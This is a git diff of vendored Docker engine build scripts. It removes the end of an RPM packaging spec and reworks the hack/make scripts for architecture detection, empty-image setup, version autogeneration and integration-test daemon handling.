-%endif # centos,oraclelinux 7
-%endif # with_selinux
-
-# RE: rhbz#1195804 - ensure min NVR for selinux-policy
-%if 0%{?with_selinux}
-Requires: selinux-policy >= %{selinux_policyver}
-Requires(pre): %{name}-selinux >= %{version}-%{release}
-%endif # with_selinux
-
-# conflicting packages
-Conflicts: docker
-Conflicts: docker-io
-Conflicts: docker-engine-cs
-
-%description
-Docker is an open source project to build, ship and run any application as a
-lightweight container.
-
-Docker containers are both hardware-agnostic and platform-agnostic. This means
-they can run anywhere, from your laptop to the largest EC2 compute instance and
-everything in between - and they don't require you to use a particular
-language, framework or packaging system. That makes them great building blocks
-for deploying and scaling web apps, databases, and backend services without
-depending on a particular stack or provider.
-
-%prep
-%if 0%{?centos} <= 6 || 0%{?oraclelinux} <=6
-%setup -n %{name}
-%else
-%autosetup -n %{name}
-%endif
-
-%build
-export DOCKER_GITCOMMIT=%{_gitcommit}
-./hack/make.sh dynbinary
-# ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here
-
-%check
-./bundles/%{_origversion}/dynbinary-client/docker -v
-./bundles/%{_origversion}/dynbinary-daemon/dockerd -v
-
-%install
-# install binary
-install -d $RPM_BUILD_ROOT/%{_bindir}
-install -p -m 755 bundles/%{_origversion}/dynbinary-client/docker-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/docker
-install -p -m 755 bundles/%{_origversion}/dynbinary-daemon/dockerd-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/dockerd
-
-# install proxy
-install -p -m 755 /usr/local/bin/docker-proxy $RPM_BUILD_ROOT/%{_bindir}/docker-proxy
-
-# install containerd
-install -p -m 755 /usr/local/bin/docker-containerd $RPM_BUILD_ROOT/%{_bindir}/docker-containerd
-install -p -m 755 /usr/local/bin/docker-containerd-shim $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-shim
-install -p -m 755 /usr/local/bin/docker-containerd-ctr $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-ctr
-
-# install runc
-install -p -m 755 /usr/local/bin/docker-runc $RPM_BUILD_ROOT/%{_bindir}/docker-runc
-
-# install tini
-install -p -m 755 /usr/local/bin/docker-init $RPM_BUILD_ROOT/%{_bindir}/docker-init
-
-# install udev rules
-install -d $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d
-install -p -m 644 contrib/udev/80-docker.rules $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d/80-docker.rules
-
-# add init scripts
-install -d $RPM_BUILD_ROOT/etc/sysconfig
-install -d $RPM_BUILD_ROOT/%{_initddir}
-
-
-%if 0%{?is_systemd}
-install -d $RPM_BUILD_ROOT/%{_unitdir}
-install -p -m 644 contrib/init/systemd/docker.service.rpm $RPM_BUILD_ROOT/%{_unitdir}/docker.service
-%else
-install -p -m 644 contrib/init/sysvinit-redhat/docker.sysconfig $RPM_BUILD_ROOT/etc/sysconfig/docker
-install -p -m 755 contrib/init/sysvinit-redhat/docker $RPM_BUILD_ROOT/%{_initddir}/docker
-%endif
-# add bash, zsh, and fish completions
-install -d $RPM_BUILD_ROOT/usr/share/bash-completion/completions
-install -d $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions
-install -d $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d
-install -p -m 644 contrib/completion/bash/docker $RPM_BUILD_ROOT/usr/share/bash-completion/completions/docker
-install -p -m 644 contrib/completion/zsh/_docker $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions/_docker
-install -p -m 644 contrib/completion/fish/docker.fish $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d/docker.fish
-
-# install manpages
-install -d %{buildroot}%{_mandir}/man1
-install -p -m 644 man/man1/*.1 $RPM_BUILD_ROOT/%{_mandir}/man1
-install -d %{buildroot}%{_mandir}/man5
-install -p -m 644 man/man5/*.5 $RPM_BUILD_ROOT/%{_mandir}/man5
-install -d %{buildroot}%{_mandir}/man8
-install -p -m 644 man/man8/*.8 $RPM_BUILD_ROOT/%{_mandir}/man8
-
-# add vimfiles
-install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc
-install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect
-install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax
-install -p -m 644 contrib/syntax/vim/doc/dockerfile.txt $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc/dockerfile.txt
-install -p -m 644 contrib/syntax/vim/ftdetect/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect/dockerfile.vim
-install -p -m 644 contrib/syntax/vim/syntax/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax/dockerfile.vim
-
-# add nano
-install -d $RPM_BUILD_ROOT/usr/share/nano
-install -p -m 644 contrib/syntax/nano/Dockerfile.nanorc $RPM_BUILD_ROOT/usr/share/nano/Dockerfile.nanorc
-
-# list files owned by the package here
-%files
-%doc AUTHORS CHANGELOG.md CONTRIBUTING.md LICENSE MAINTAINERS NOTICE README.md
-/%{_bindir}/docker
-/%{_bindir}/dockerd
-/%{_bindir}/docker-containerd
-/%{_bindir}/docker-containerd-shim
-/%{_bindir}/docker-containerd-ctr
-/%{_bindir}/docker-proxy
-/%{_bindir}/docker-runc
-/%{_bindir}/docker-init
-/%{_sysconfdir}/udev/rules.d/80-docker.rules
-%if 0%{?is_systemd}
-/%{_unitdir}/docker.service
-%else
-%config(noreplace,missingok) /etc/sysconfig/docker
-/%{_initddir}/docker
-%endif
-/usr/share/bash-completion/completions/docker
-/usr/share/zsh/vendor-completions/_docker
-/usr/share/fish/vendor_completions.d/docker.fish
-%doc
-/%{_mandir}/man1/*
-/%{_mandir}/man5/*
-/%{_mandir}/man8/*
-/usr/share/vim/vimfiles/doc/dockerfile.txt
-/usr/share/vim/vimfiles/ftdetect/dockerfile.vim
-/usr/share/vim/vimfiles/syntax/dockerfile.vim
-/usr/share/nano/Dockerfile.nanorc
-
-%post
-%if 0%{?is_systemd}
-%systemd_post docker
-%else
-# This adds the proper /etc/rc*.d links for the script
-/sbin/chkconfig --add docker
-%endif
-if ! getent group docker > /dev/null; then
-    groupadd --system docker
-fi
-
-%preun
-%if 0%{?is_systemd}
-%systemd_preun docker
-%else
-if [ $1 -eq 0 ] ; then
-    /sbin/service docker stop >/dev/null 2>&1
-    /sbin/chkconfig --del docker
-fi
-%endif
-
-%postun
-%if 0%{?is_systemd}
-%systemd_postun_with_restart docker
-%else
-if [ "$1" -ge "1" ] ; then
-    /sbin/service docker condrestart >/dev/null 2>&1 || :
-fi
-%endif
-
-%changelog
diff --git a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch
index 73955392d0..91e2c53c75 100644
--- a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch
+++ b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch
@@ -1,7 +1,11 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
 docker-version-osarch() {
+	if ! type docker &>/dev/null; then
+		# docker is not installed
+		return
+	fi
 	local target="$1" # "Client" or "Server"
 	local fmtStr="{{.${target}.Os}}/{{.${target}.Arch}}"
 	if docker version -f "$fmtStr" 2>/dev/null; then
@@ -19,7 +23,7 @@ docker-version-osarch() {
 }
 
 # Retrieve OS/ARCH of docker daemon, e.g. linux/amd64
-export DOCKER_ENGINE_OSARCH="$(docker-version-osarch 'Server')"
+export DOCKER_ENGINE_OSARCH="${DOCKER_ENGINE_OSARCH:=$(docker-version-osarch 'Server')}"
 export DOCKER_ENGINE_GOOS="${DOCKER_ENGINE_OSARCH%/*}"
 export DOCKER_ENGINE_GOARCH="${DOCKER_ENGINE_OSARCH##*/}"
 DOCKER_ENGINE_GOARCH=${DOCKER_ENGINE_GOARCH:=amd64}
@@ -30,40 +34,10 @@ export DOCKER_CLIENT_GOOS="${DOCKER_CLIENT_OSARCH%/*}"
 export DOCKER_CLIENT_GOARCH="${DOCKER_CLIENT_OSARCH##*/}"
 DOCKER_CLIENT_GOARCH=${DOCKER_CLIENT_GOARCH:=amd64}
 
-# Retrieve the architecture used in contrib/builder/(deb|rpm)/$PACKAGE_ARCH/
-PACKAGE_ARCH='amd64'
-case "${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" in
-	arm)
-		PACKAGE_ARCH='armhf'
-		;;
-	arm64)
-		PACKAGE_ARCH='aarch64'
-		;;
-	amd64|ppc64le|s390x)
-		PACKAGE_ARCH="${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}"
-		;;
-	*)
-		echo >&2 "warning: not sure how to convert '$DOCKER_ENGINE_GOARCH' to a 'Docker' arch, assuming '$PACKAGE_ARCH'"
-		;;
-esac
-export PACKAGE_ARCH
-
 DOCKERFILE='Dockerfile'
-TEST_IMAGE_NAMESPACE=
-case "$PACKAGE_ARCH" in
-	amd64)
-		case "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" in
-			windows)
-				DOCKERFILE='Dockerfile.windows'
-				;;
-			solaris)
-				DOCKERFILE='Dockerfile.solaris'
-				;;
-		esac
-		;;
-	*)
-		DOCKERFILE="Dockerfile.$PACKAGE_ARCH"
-		TEST_IMAGE_NAMESPACE="$PACKAGE_ARCH"
-		;;
-esac
-export DOCKERFILE TEST_IMAGE_NAMESPACE
+
+if [ "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" = "windows" ]; then
+	DOCKERFILE='Dockerfile.windows'
+fi
+
+export DOCKERFILE
diff --git a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs
index e71a30ae81..898cc22834 100644
--- a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs
+++ b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs
@@ -1,23 +1,23 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
-if ! docker inspect emptyfs &> /dev/null; then
-	# let's build a "docker save" tarball for "emptyfs"
+if ! docker image inspect emptyfs > /dev/null; then
+	# build a "docker save" tarball for "emptyfs"
 	# see https://github.com/docker/docker/pull/5262
 	# and also https://github.com/docker/docker/issues/4242
 	dir="$DEST/emptyfs"
-	mkdir -p "$dir"
+	uuid=511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158
+	mkdir -p "$dir/$uuid"
 	(
-		cd "$dir"
-		echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > repositories
-		mkdir -p 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158
-		(
-			cd 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158
-			echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > json
-			echo '1.0' > VERSION
-			tar -cf layer.tar --files-from /dev/null
-		)
+		echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > "$dir/repositories"
+		cd "$dir/$uuid"
+		echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > json
+		echo '1.0' > VERSION
+		tar -cf layer.tar --files-from /dev/null
+	)
+	(
+		[ -n "$TESTDEBUG" ] && set -x
+		tar -cC "$dir" . | docker load
 	)
-	( set -x; tar -cC "$dir" . | docker load )
 	rm -rf "$dir"
 fi
diff --git a/vendor/github.com/docker/docker/hack/make/.go-autogen b/vendor/github.com/docker/docker/hack/make/.go-autogen
index 4d26052bb7..ba001895d8 100644
--- a/vendor/github.com/docker/docker/hack/make/.go-autogen
+++ b/vendor/github.com/docker/docker/hack/make/.go-autogen
@@ -1,8 +1,10 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 rm -rf autogen
 
-source hack/dockerfile/binaries-commits
+source hack/dockerfile/install/runc.installer
+source hack/dockerfile/install/tini.installer
+source hack/dockerfile/install/containerd.installer
 
 cat > dockerversion/version_autogen.go <<DVEOF
 // +build autogen
@@ -17,6 +19,8 @@ const (
 	Version            string = "$VERSION"
 	BuildTime          string = "$BUILDTIME"
 	IAmStatic          string = "${IAMSTATIC:-true}"
+	ContainerdCommitID string = "${CONTAINERD_COMMIT}"
+	PlatformName       string = "${PLATFORM}"
 )
 
 // AUTOGENERATED FILE; see /go/src/github.com/docker/docker/hack/make/.go-autogen
@@ -31,9 +35,8 @@ package dockerversion
 // Default build-time variable for library-import.
 // This file is overridden on build with build-time informations.
 const (
-	ContainerdCommitID string = "${CONTAINERD_COMMIT}"
-	RuncCommitID       string = "${RUNC_COMMIT}"
-	InitCommitID       string = "${TINI_COMMIT}"
+	RuncCommitID string = "${RUNC_COMMIT}"
+	InitCommitID string = "${TINI_COMMIT}"
 )
 
 // AUTOGENERATED FILE; see /go/src/github.com/docker/docker/hack/make/.go-autogen
diff --git a/vendor/github.com/docker/docker/hack/make/.go-autogen.ps1 b/vendor/github.com/docker/docker/hack/make/.go-autogen.ps1
index 3adc4c3e97..cc14e9ee9d 100644
--- a/vendor/github.com/docker/docker/hack/make/.go-autogen.ps1
+++ b/vendor/github.com/docker/docker/hack/make/.go-autogen.ps1
@@ -9,12 +9,13 @@
      The commit string. This is calculated externally to this script.
 
 .PARAMETER DockerVersion
-     The version such as 1.14.0-dev. This is calculated externally to this script.
+     The version such as 17.04.0-dev. This is calculated externally to this script.
 #>
 
 param(
     [Parameter(Mandatory=$true)][string]$CommitString,
-    [Parameter(Mandatory=$true)][string]$DockerVersion
+    [Parameter(Mandatory=$true)][string]$DockerVersion,
+    [Parameter(Mandatory=$false)][string]$Platform
 )
 
 $ErrorActionPreference = "Stop"
@@ -43,6 +44,7 @@ const (
     GitCommit          string = "'+$CommitString+'"
     Version            string = "'+$DockerVersion+'"
     BuildTime          string = "'+$buildDateTime+'"
+    PlatformName       string = "'+$Platform+'"
 )
 
 // AUTOGENERATED FILE; see hack\make\.go-autogen.ps1
diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup
index 0efde717fc..c130e23560 100644
--- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup
+++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup
@@ -1,7 +1,7 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
-bundle .detect-daemon-osarch
-if [ $DOCKER_ENGINE_GOOS != "windows" ]; then
+source "$MAKEDIR/.detect-daemon-osarch"
+if [ "$DOCKER_ENGINE_GOOS" != "windows" ]; then
 	bundle .ensure-emptyfs
 fi
diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start
index b96979bdb2..20801fccee 100644
--- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start
+++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start
@@ -1,12 +1,19 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
-# see test-integration-cli for example usage of this script
+# see test-integration for example usage of this script
 
 base="$ABS_DEST/.."
-export PATH="$base/binary-client:$base/binary-daemon:$base/dynbinary-client:$base/dynbinary-daemon:$PATH"
+export PATH="$base/binary-daemon:$base/dynbinary-daemon:$PATH"
 
-if ! command -v docker &> /dev/null; then
-	echo >&2 'error: binary-client or dynbinary-client must be run before .integration-daemon-start'
+export TEST_CLIENT_BINARY=docker
+
+if [ -n "$DOCKER_CLI_PATH" ]; then
+	export TEST_CLIENT_BINARY=/usr/local/cli/$(basename "$DOCKER_CLI_PATH")
+fi
+
+echo "Using test binary $TEST_CLIENT_BINARY"
+if ! command -v "$TEST_CLIENT_BINARY" &> /dev/null; then
+	echo >&2 'error: missing test client $TEST_CLIENT_BINARY'
 	false
 fi
 
@@ -44,12 +51,13 @@ if [ -n "$DOCKER_STORAGE_OPTS" ]; then
 	unset IFS
 fi
 
-# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G"
+# example usage: DOCKER_REMAP_ROOT=default
 extra_params=""
 if [ "$DOCKER_REMAP_ROOT" ]; then
 	extra_params="--userns-remap $DOCKER_REMAP_ROOT"
 fi
 
+# example usage: DOCKER_EXPERIMENTAL=1
 if [  "$DOCKER_EXPERIMENTAL" ]; then
 	echo >&2 '# DOCKER_EXPERIMENTAL is set: starting daemon with experimental features enabled! '
 	extra_params="$extra_params --experimental"
@@ -62,24 +70,26 @@ if [ -z "$DOCKER_TEST_HOST" ]; then
 		# see https://github.com/docker/libcontainer/blob/master/apparmor/apparmor.go#L16
 		export container=""
 		(
-			set -x
+			[ -n "$TESTDEBUG" ] && set -x
 			/etc/init.d/apparmor start
 		)
 	fi
 
-	export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock" # "pwd" tricks to make sure $DEST is an absolute path, not a relative one
-	( set -x; exec \
-		dockerd --debug \
-		--host "$DOCKER_HOST" \
-		--storage-driver "$DOCKER_GRAPHDRIVER" \
-		--pidfile "$DEST/docker.pid" \
-		--userland-proxy="$DOCKER_USERLANDPROXY" \
-		$storage_params \
-		$extra_params \
-			&> "$DEST/docker.log"
+	# "pwd" tricks to make sure $DEST is an absolute path, not a relative one
+	export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock"
+	(
+		echo "Starting dockerd"
+		[ -n "$TESTDEBUG" ] && set -x
+		exec \
+			dockerd --debug \
+			--host "$DOCKER_HOST" \
+			--storage-driver "$DOCKER_GRAPHDRIVER" \
+			--pidfile "$DEST/docker.pid" \
+			--userland-proxy="$DOCKER_USERLANDPROXY" \
+			$storage_params \
+			$extra_params \
+				&> "$DEST/docker.log"
 	) &
-	# make sure that if the script exits unexpectedly, we stop this daemon we just started
-	trap 'bundle .integration-daemon-stop' EXIT
 else
 	export DOCKER_HOST="$DOCKER_TEST_HOST"
 fi
@@ -87,7 +97,7 @@ fi
 # give it a little time to come up so it's "ready"
 tries=60
 echo "INFO: Waiting for daemon to start..."
-while ! docker version &> /dev/null; do
+while ! $TEST_CLIENT_BINARY version &> /dev/null; do
 	(( tries-- ))
 	if [ $tries -le 0 ]; then
 		printf "\n"
@@ -95,8 +105,8 @@ while ! docker version &> /dev/null; do
 			echo >&2 "error: daemon failed to start"
 			echo >&2 "  check $DEST/docker.log for details"
 		else
-			echo >&2 "error: daemon at $DOCKER_HOST fails to 'docker version':"
-			docker version >&2 || true
+			echo >&2 "error: daemon at $DOCKER_HOST fails to '$TEST_CLIENT_BINARY version':"
+			$TEST_CLIENT_BINARY version >&2 || true
 			# Additional Windows CI debugging as this is a common error as of
 			# January 2016
 			if [ "$(go env GOOS)" = 'windows' ]; then
diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop
index 03c1b14689..c1d43e1a5e 100644
--- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop
+++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop
@@ -1,11 +1,12 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 if [ ! "$(go env GOOS)" = 'windows' ]; then
-	trap - EXIT # reset EXIT trap applied in .integration-daemon-start
-
 	for pidFile in $(find "$DEST" -name docker.pid); do
-		pid=$(set -x; cat "$pidFile")
-		( set -x; kill "$pid" )
+		pid=$([ -n "$TESTDEBUG" ] && set -x; cat "$pidFile")
+		(
+			[ -n "$TESTDEBUG" ] && set -x
+			kill "$pid"
+		)
 		if ! wait "$pid"; then
 			echo >&2 "warning: PID $pid from $pidFile had a nonzero exit code"
 		fi
@@ -15,7 +16,7 @@ if [ ! "$(go env GOOS)" = 'windows' ]; then
 		# Stop apparmor if it is enabled
 		if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then
 			(
-				set -x
+				[ -n "$TESTDEBUG" ] && set -x
 				/etc/init.d/apparmor stop
 			)
 		fi
diff --git a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers
index 7b73b2f140..da2bb7cad2 100644
--- a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers
+++ b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers
@@ -1,64 +1,91 @@
-#!/bin/bash
-
-: ${TEST_REPEAT:=0}
-
-bundle_test_integration_cli() {
-	TESTFLAGS="$TESTFLAGS -check.v -check.timeout=${TIMEOUT} -test.timeout=360m"
-	go_test_dir integration-cli $DOCKER_INTEGRATION_TESTS_VERIFIED
-}
-
-# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'.
-# You can use this to select certain tests to run, e.g.
-#
-#     TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit
+#!/usr/bin/env bash
 #
 # For integration-cli test, we use [gocheck](https://labix.org/gocheck), if you want
 # to run certain tests on your local host, you should run with command:
 #
-#     TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration-cli
+#     TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration
 #
-go_test_dir() {
-	dir=$1
-	precompiled=$2
-	testbinary="$DEST/test.main"
-	testcover=()
-	testcoverprofile=()
-	(
-		mkdir -p "$DEST/coverprofiles"
-		export DEST="$ABS_DEST" # in a subshell this is safe -- our integration-cli tests need DEST, and "cd" screws it up
-		if [ -z $precompiled ]; then
-			ensure_test_dir $1 $testbinary
-		fi
-		cd "$dir"
-		i=0
-		while ((++i)); do
-			test_env "$testbinary" $TESTFLAGS
-			if [ $i -gt "$TEST_REPEAT" ]; then
-				break
-			fi
-			echo "Repeating test ($i)"
-		done
-	)
+if [ -z $MAKEDIR ]; then
+	export MAKEDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+fi
+source "$MAKEDIR/.go-autogen"
+
+# Set defaults
+: ${TEST_REPEAT:=1}
+: ${TESTFLAGS:=}
+: ${TESTDEBUG:=}
+
+integration_api_dirs=${TEST_INTEGRATION_DIR:-"$(
+	find ./integration -type d |
+	grep -vE '(^./integration($|/internal)|/testdata)')"}
+
+run_test_integration() {
+	[[ "$TESTFLAGS" != *-check.f* ]] && run_test_integration_suites
+	run_test_integration_legacy_suites
+}
+
+run_test_integration_suites() {
+	local flags="-test.v -test.timeout=${TIMEOUT} $TESTFLAGS"
+	for dir in $integration_api_dirs; do
+		if ! (
+			cd $dir
+			echo "Running $PWD"
+			test_env ./test.main $flags
+		); then exit 1; fi
+	done
 }
 
-ensure_test_dir() {
+run_test_integration_legacy_suites() {
 	(
-		# make sure a test dir will compile
-		dir="$1"
-		out="$2"
-		echo Building test dir: "$dir"
-		set -xe
-		cd "$dir"
-		go test -c -o "$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}"
+		flags="-check.v -check.timeout=${TIMEOUT} -test.timeout=360m $TESTFLAGS"
+		cd integration-cli
+		echo "Running $PWD"
+		test_env ./test.main $flags
 	)
 }
 
+build_test_suite_binaries() {
+	if [ ${DOCKER_INTEGRATION_TESTS_VERIFIED-} ]; then
+		echo "Skipping building test binaries; as DOCKER_INTEGRATION_TESTS_VERIFIED is set"
+		return
+	fi
+	build_test_suite_binary ./integration-cli "test.main"
+	for dir in $integration_api_dirs; do
+		build_test_suite_binary "$dir" "test.main"
+	done
+}
+
+# Build a binary for a test suite package
+build_test_suite_binary() {
+	local dir="$1"
+	local out="$2"
+	echo Building test suite binary "$dir/$out"
+	go test -c -o "$dir/$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" "$dir"
+}
+
+cleanup_test_suite_binaries() {
+	[ -n "$TESTDEBUG" ] && return
+	echo "Removing test suite binaries"
+	find integration* -name test.main | xargs -r rm
+}
+
+repeat() {
+	for i in $(seq 1 $TEST_REPEAT); do
+		echo "Running integration-test (iteration $i)"
+		$@
+	done
+}
+
+# use "env -i" to tightly control the environment variables that bleed into the tests
 test_env() {
 	(
-		set -xe
-		# use "env -i" to tightly control the environment variables that bleed into the tests
+		set -e
+		[ -n "$TESTDEBUG" ] && set -x
 		env -i \
-			DEST="$DEST" \
+			DEST="$ABS_DEST" \
+			DOCKER_API_VERSION="$DOCKER_API_VERSION" \
+			DOCKER_BUILDKIT="$DOCKER_BUILDKIT" \
+			DOCKER_INTEGRATION_DAEMON_DEST="$DOCKER_INTEGRATION_DAEMON_DEST" \
 			DOCKER_TLS_VERIFY="$DOCKER_TEST_TLS_VERIFY" \
 			DOCKER_CERT_PATH="$DOCKER_TEST_CERT_PATH" \
 			DOCKER_ENGINE_GOARCH="$DOCKER_ENGINE_GOARCH" \
@@ -73,7 +100,23 @@ test_env() {
 			HOME="$ABS_DEST/fake-HOME" \
 			PATH="$PATH" \
 			TEMP="$TEMP" \
-			TEST_IMAGE_NAMESPACE="$TEST_IMAGE_NAMESPACE" \
+			TEST_CLIENT_BINARY="$TEST_CLIENT_BINARY" \
 			"$@"
 	)
 }
+   
+
+error_on_leaked_containerd_shims() {
+	if [ "$(go env GOOS)" == 'windows' ]; then
+		return
+	fi
+
+	leftovers=$(ps -ax -o pid,cmd |
+	            awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration/ { print $1 }')
+	if [ -n "$leftovers" ]; then
+		ps aux
+		kill -9 $leftovers 2> /dev/null
+		echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!"
+		exit 1
+	fi
+}
diff --git a/vendor/github.com/docker/docker/hack/make/README.md b/vendor/github.com/docker/docker/hack/make/README.md
index 6574b0efe6..3d069fa165 100644
--- a/vendor/github.com/docker/docker/hack/make/README.md
+++ b/vendor/github.com/docker/docker/hack/make/README.md
@@ -4,10 +4,9 @@ Each script is named after the bundle it creates.
 They should not be called directly - instead, pass it as argument to make.sh, for example:
 
 ```
-./hack/make.sh test
 ./hack/make.sh binary ubuntu
 
-# Or to run all bundles:
+# Or to run all default bundles:
 ./hack/make.sh
 ```
 
diff --git a/vendor/github.com/docker/docker/hack/make/binary b/vendor/github.com/docker/docker/hack/make/binary
index 88b22cd462..eab69bb065 100644
--- a/vendor/github.com/docker/docker/hack/make/binary
+++ b/vendor/github.com/docker/docker/hack/make/binary
@@ -1,13 +1,8 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 rm -rf "$DEST"
 
 # This script exists as backwards compatibility for CI
-(
-	DEST="${DEST}-client"
-	ABS_DEST="${ABS_DEST}-client"
-	. hack/make/binary-client
-)
 (
 	DEST="${DEST}-daemon"
 	ABS_DEST="${ABS_DEST}-daemon"
diff --git a/vendor/github.com/docker/docker/hack/make/binary-client b/vendor/github.com/docker/docker/hack/make/binary-client
deleted file mode 100644
index 1731fea8b0..0000000000
--- a/vendor/github.com/docker/docker/hack/make/binary-client
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/bin/bash
-set -e
-
-[ -z "$KEEPDEST" ] && \
-	rm -rf "$DEST"
-
-(
-	source "${MAKEDIR}/.binary-setup"
-	export BINARY_SHORT_NAME="$DOCKER_CLIENT_BINARY_NAME"
-	export GO_PACKAGE='github.com/docker/docker/cmd/docker'
-	source "${MAKEDIR}/.binary"
-)
diff --git a/vendor/github.com/docker/docker/hack/make/binary-daemon b/vendor/github.com/docker/docker/hack/make/binary-daemon
index e255543c16..f68163636b 100644
--- a/vendor/github.com/docker/docker/hack/make/binary-daemon
+++ b/vendor/github.com/docker/docker/hack/make/binary-daemon
@@ -1,13 +1,27 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
-[ -z "$KEEPDEST" ] && \
-	rm -rf "$DEST"
+copy_binaries() {
+	local dir="$1"
+	local hash="$2"
+	# Add nested executables to bundle dir so we have complete set of
+	# them available, but only if the native OS/ARCH is the same as the
+	# OS/ARCH of the build target
+	if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then
+		return
+	fi
+	if [ ! -x /usr/local/bin/docker-runc ]; then
+		return
+	fi
+	echo "Copying nested executables into $dir"
+	for file in containerd containerd-shim containerd-ctr runc init proxy; do
+		cp -f `which "docker-$file"` "$dir/"
+		if [ "$hash" == "hash" ]; then
+			hash_files "$dir/docker-$file"
+		fi
+	done
+}
 
-(
-	source "${MAKEDIR}/.binary-setup"
-	export BINARY_SHORT_NAME="$DOCKER_DAEMON_BINARY_NAME"
-	export GO_PACKAGE='github.com/docker/docker/cmd/dockerd'
-	source "${MAKEDIR}/.binary"
-	copy_binaries "$DEST" 'hash'
-)
+[ -z "$KEEPDEST" ] && rm -rf "$DEST"
+source "${MAKEDIR}/.binary"
